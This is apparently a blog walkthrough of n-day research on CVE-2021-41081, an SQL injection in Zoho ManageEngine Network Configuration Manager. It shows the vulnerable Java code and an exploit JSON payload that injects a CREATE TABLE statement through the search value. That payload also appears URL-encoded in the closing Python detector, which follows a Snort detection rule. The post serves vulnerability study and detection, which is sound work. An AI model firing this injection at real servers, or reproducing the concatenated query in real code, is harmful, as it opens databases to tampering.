N-day Vulnerability Research (CVE-2021-41081)


In this blog post we’ll explore the process of performing n-day vulnerability research.

CVE-2021-41081 was assigned to an SQL injection vulnerability in the configuration search of Zoho ManageEngine Network Configuration Manager (NCM).

We can find more details about this vulnerability in the advisory.


Vulnerability Details
SeverityHigh
Reported07 Sep 2021
Fixed08-Sep-2021
Affected BuildsBuilds 123055 - 125464
Fixed inBuilds 125465/125436/125455
OverviewThe SQL injection vulnerability issue in configuration search has now been fixed.

We’ll go over each of the steps involved in the n-day vulnerability research:

  1. Obtain vulnerable and patched version of the product
  2. Create setup
  3. Perform source code diffing
  4. Perform root cause analysis
  5. Exploit
  6. Detection

1. Obtain Vulnerable and Patched Version

We can obtain the vulnerable version of Network Configuration Manager from the official source.

We’ll grab builds 125465 (fixed version) and 125451 (vulnerable version).

2. Create Setup

Install MSSQL Server and SQL Server Management Studio (SSMS). Install both NCM versions on separate VMs.

3. Source Code Diffing

We use IntelliJ IDEA to diff the Java source code. The relevant source files for this vulnerability are in lib/AdvNCM.jar: the classes NCMConfigCrawler.class and NCMMSSQLConfigCrawler.class were updated to mitigate the SQL injection vulnerability.

4. Root Cause Analysis

The criteria JSON key holds the configuration search criteria, and each value in it is concatenated directly into the SQL statement:

public String getCriteriaString() throws Exception {
    StringBuilder criteria = new StringBuilder();
    JSONArray advConfigSearchArr = this.searchCriteria.getJSONArray("criteria");

    for(int i = 0; i < advConfigSearchArr.length(); ++i) {
        JSONObject conditionObj = advConfigSearchArr.getJSONObject(i);
        // "value" is taken from the request as-is: no escaping, no parameter binding
        String value = conditionObj.getString("value");
        // The user-controlled string lands inside the LIKE literal; a single quote closes it
        String append = "( FILE_CONTENTS LIKE '%" + value + "%' )";
        // ... SQL statement built with user input
        criteria.append(append);
    }
    return criteria.toString();
}

5. Exploit

The following payload creates a new table named SQLi:

{
  "criteria": [
    {
      "andor": "or",
      "condition": "search",
      "value": "1' )); CREATE TABLE SQLi (a int); --"
    }
  ]
}

6. Detection

We can create a Snort rule to detect this exploitation attempt:

alert tcp $EXTERNAL_NET any -> $HOME_NET [$HTTP_PORTS,8060] ( \
    msg:"CVE-2021-41081 SQL Injection Attempt"; \
    flow:to_server,established; \
    content:"GET /client/api/json/ncmconfig/searchConfig"; fast_pattern:only; \
    content:"CONFIG_SEARCH_CRITERIA="; nocase; \
    content:"%22criteria%22"; distance:0; nocase; \
    content:"%22value%22"; distance:0; nocase; \
    content:"%27"; distance:0; within:30; nocase; \
    classtype:web-application-attack; \
    sid:1000000; \
)
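As an added example (not code from the original post or from ManageEngine), the same detection logic as the Snort rule, carried out in Python over constructed request lines: it decodes the CONFIG_SEARCH_CRITERIA parameter and parses the JSON, so the check runs on the actual search value rather than on percent-encoded bytes. The path and parameter name come from the rule; the metacharacter list and the request lines are my assumptions.

```python
import json
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Path and parameter name are taken from the Snort rule above; the
# metacharacter list and the request lines below are constructed.
SEARCH_PATH = "/client/api/json/ncmconfig/searchConfig"
PARAM = "CONFIG_SEARCH_CRITERIA"
# A configuration search term has no business containing a quote (the %27
# the rule looks for), a statement separator or a SQL comment marker.
SUSPECT = re.compile(r"['\";]|--|/\*")


def inspect_request(request_line: str) -> Optional[dict]:
    """Return a finding for a suspicious searchConfig request, else None.

    Follows the rule's order (URI, parameter, "criteria", "value") but decodes
    the parameter and parses the JSON, so the check runs on the real search
    value rather than on a 30-byte window of percent-encoded bytes.
    """
    target = request_line.split(" ")[1] if " " in request_line else request_line
    parts = urlsplit(target)
    if not parts.path.startswith(SEARCH_PATH):
        return None
    raw = parse_qs(parts.query).get(PARAM)
    if not raw:
        return None
    try:
        criteria = json.loads(raw[0]).get("criteria", [])
    except (ValueError, AttributeError):
        return {"reason": "malformed criteria JSON", "value": raw[0]}
    for cond in criteria:
        value = str(cond.get("value", "")) if isinstance(cond, dict) else ""
        if SUSPECT.search(value):
            return {"reason": "SQL metacharacters in search value", "value": value}
    return None


# Constructed request lines: the first carries the post's payload URL-encoded,
# the second is a legitimate search for the text "interface Gig".
REQUESTS = [
    "GET " + SEARCH_PATH + "?" + PARAM + "="
    "%7B%22criteria%22%3A%5B%7B%22andor%22%3A%22or%22%2C%22condition%22%3A"
    "%22search%22%2C%22value%22%3A%221%27%20%29%29%3B%20CREATE%20TABLE%20SQLi"
    "%20%28a%20int%29%3B%20--%22%7D%5D%7D HTTP/1.1",
    "GET " + SEARCH_PATH + "?" + PARAM + "="
    "%7B%22criteria%22%3A%5B%7B%22andor%22%3A%22or%22%2C%22condition%22%3A"
    "%22search%22%2C%22value%22%3A%22interface%20Gig%22%7D%5D%7D HTTP/1.1",
]
```

Running inspect_request over REQUESTS flags the first line and returns None for the benign search, which is a quick way to check a rule's field ordering against a captured request before deploying it.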

Thank you for reading. I hope you found this blog post helpful!

~Amit